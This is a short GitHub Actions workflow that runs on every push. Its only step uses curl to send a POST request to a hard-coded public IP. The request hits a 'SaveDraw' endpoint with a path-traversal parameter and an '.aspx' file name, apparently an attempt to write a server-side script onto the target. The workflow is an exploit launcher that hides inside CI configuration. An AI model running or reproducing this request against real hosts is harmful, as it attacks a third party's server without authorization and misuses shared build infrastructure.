name: autoAction
on: [push]
jobs:
  Test-GitHub-Actions:
    runs-on: ubuntu-latest
    steps:
      - name: curl
        continue-on-error: true
        run: |
          echo -e '\n-------------------------------------------------\n'
          echo -e '\nhttp://103.30.17.32:8088/PW/SaveDraw?path=../../Content/img&idx=11.aspx\n'
          curl -i -s -k --compressed -m 10 -X $'POST' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -d $'' $'http://103.30.17.32:8088/PW/SaveDraw?path=../../Content/img&idx=11.aspx'
          echo -e '\n-------------------------------------------------\n'
